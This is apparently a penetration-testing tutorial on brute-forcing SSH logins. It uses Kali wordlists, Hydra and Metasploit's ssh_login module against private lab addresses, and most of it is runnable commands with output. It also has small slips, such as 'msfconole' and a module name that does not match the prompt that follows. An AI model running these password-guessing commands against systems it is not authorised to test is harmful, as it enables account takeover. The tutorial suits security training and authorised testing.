Crack the password over the internet
Sometimes if the target didnt expose any hashed password or vulnerabilities,
we can use brute forcing attack for cracking the password itself.
It is a last resort since it will generate large amount of traffic & noise.
Tools
-
Password dictionary
In kali, we can use
wordlists
as a keyword to search through the password.or you can download it from the internet, build it yourself is also a option.
Password cracker
Burp
Metasploit
hydra
A lot of tools can achieve it
Example - cracking ssh
Locate wordlist, pick one, or build one. Its up to you.
root@kali:~# locate wordlist | head -n 20
/usr/bin/wordlists
/usr/sbin/remove-default-wordlist
/usr/sbin/select-default-wordlist
/usr/sbin/update-default-wordlist
/usr/share/wordlists
/usr/share/applications/kali-wordlists.desktop
/usr/share/dict/README.select-wordlist
/usr/share/dict/wordlist-top4800-probable.txt
/usr/share/dirb/wordlists
/usr/share/dirb/wordlists/big.txt
/usr/share/dirb/wordlists/catala.txt
/usr/share/dirb/wordlists/common.txt
/usr/share/dirb/wordlists/euskera.txt
/usr/share/dirb/wordlists/extensions_common.txt
/usr/share/dirb/wordlists/indexes.txt
/usr/share/dirb/wordlists/mutations_common.txt
/usr/share/dirb/wordlists/others
/usr/share/dirb/wordlists/small.txt
/usr/share/dirb/wordlists/spanish.txt
/usr/share/dirb/wordlists/stress
...
Hydra
root@kali:~# hydra -h
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]
Options:
-R restore a previous aborted/crashed session
-I ignore an existing restore file (don't wait 10 seconds)
-S perform an SSL connect
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
-y disable use of symbols in bruteforce, see above
-e nsr try "n" null password, "s" login as pass and/or "r" reversed login
-u loop around users, not passwords (effective! implied with -x)
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-o FILE write found login/password pairs to FILE instead of stdout
-b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
-t TASKS run TASKS number of connects in parallel per target (default: 16)
-T TASKS run TASKS connects in parallel overall (for -M, default: 64)
-w / -W TIME wait time for a response (32) / between connects per thread (0)
-c TIME wait time per login attempt over all threads (enforces -t 1)
-4 / -6 use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
-v / -V / -d verbose mode / show login+pass for each attempt / debug mode
-O use old SSL v2 and v3
-q do not print messages about connection errors
-U service module usage details
-h more command line options (COMPLETE HELP)
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)
Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql
nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at https://github.com/vanhauser-thc/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.
These services were not compiled in: afp ncp oracle sapr3.
Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:[email protected]:9150 (or: socks4:// connect://)
% export HYDRA_PROXY=connect_and_socks_proxylist.txt (up to 64 entries)
% export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
% export HYDRA_PROXY_HTTP=proxylist.txt (up to 64 entries)
Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
Start cracking it
root@kali:~# locate wordlist | grep password | head -n 20
/usr/share/metasploit-framework/data/wordlists/hci_oracle_passwords.csv
/usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt
/usr/share/metasploit-framework/data/wordlists/oracle_default_passwords.csv
/usr/share/metasploit-framework/data/wordlists/password.lst
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
/usr/share/metasploit-framework/data/wordlists/vnc_passwords.txt
root@kali:~# wc -l /usr/share/metasploit-framework/data/wordlists/password.lst
88397 /usr/share/metasploit-framework/data/wordlists/password.lst
root@kali:~# hydra -v -l root -P /usr/share/metasploit-framework/data/wordlists/password.lst -t 1 192.168.56.103 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-11-04 23:54:14
[DATA] max 1 task per 1 server, overall 1 task, 88397 login tries (l:1/p:88397), ~88397 tries per task
[DATA] attacking ssh://192.168.56.103:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://[email protected]:22
[INFO] Successful, password authentication is supported by ssh://192.168.56.103:22
now just wait for it, it takes time to crack.
It will prompt you the results upon completion.
Metasploit
> msfconole
> search ssh
msf5 > search ssh
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/windows/ssh/sysax_sshd_kexchange 2013-03-17 normal No Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service
1 auxiliary/fuzzers/ssh/ssh_kexinit_corrupt normal No SSH Key Exchange Init Corruption
2 auxiliary/fuzzers/ssh/ssh_version_15 normal No SSH 1.5 Version Fuzzer
3 auxiliary/fuzzers/ssh/ssh_version_2 normal No SSH 2.0 Version Fuzzer
4 auxiliary/fuzzers/ssh/ssh_version_corrupt normal No SSH Version Corruption
5 auxiliary/scanner/http/cisco_firepower_login normal Yes Cisco Firepower Management Console 6.0 Login
6 auxiliary/scanner/http/gitlab_user_enum 2014-11-21 normal Yes GitLab User Enumeration
7 auxiliary/scanner/ssh/apache_karaf_command_execution 2016-02-09 normal Yes Apache Karaf Default Credentials Command Execution
8 auxiliary/scanner/ssh/cerberus_sftp_enumusers 2014-05-27 normal Yes Cerberus FTP Server SFTP Username Enumeration
9 auxiliary/scanner/ssh/detect_kippo normal Yes Kippo SSH Honeypot Detector
10 auxiliary/scanner/ssh/eaton_xpert_backdoor 2018-07-18 normal Yes Eaton Xpert Meter SSH Private Key Exposure Scanner
11 auxiliary/scanner/ssh/fortinet_backdoor 2016-01-09 normal Yes Fortinet SSH Backdoor Scanner
12 auxiliary/scanner/ssh/juniper_backdoor 2015-12-20 normal Yes Juniper SSH Backdoor Scanner
13 auxiliary/scanner/ssh/karaf_login normal Yes Apache Karaf Login Utility
14 auxiliary/scanner/ssh/libssh_auth_bypass 2018-10-16 normal Yes libssh Authentication Bypass Scanner
15 auxiliary/scanner/ssh/ssh_enumusers normal Yes SSH Username Enumeration
16 auxiliary/scanner/ssh/ssh_identify_pubkeys normal Yes SSH Public Key Acceptance Scanner
17 auxiliary/scanner/ssh/ssh_login normal Yes SSH Login Check Scanner
18 auxiliary/scanner/ssh/ssh_login_pubkey normal Yes SSH Public Key Login Scanner
19 auxiliary/scanner/ssh/ssh_version normal Yes SSH Version Scanner
....
> use auxiliary/scanner/ssh/ssh_version
msf5 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target address range or CIDR identifier
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
msf5 auxiliary(scanner/ssh/ssh_login) > set pass_file /usr/share/metasploit-framework/data/wordlists/password.lst
pass_file => /usr/share/metasploit-framework/data/wordlists/password.lst
msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.56.101
rhosts => 192.168.56.101
msf5 auxiliary(scanner/ssh/ssh_login) > set username root
username => root
msf5 auxiliary(scanner/ssh/ssh_login) > exploit
Just like that.
And the scanning should be it.
Another tips for pwn,DON'T WASTE YOUR TIME WHILE BRUTE FORCING.
Try another stuff, do more recon, look for vulnerable endpoints.
Try more.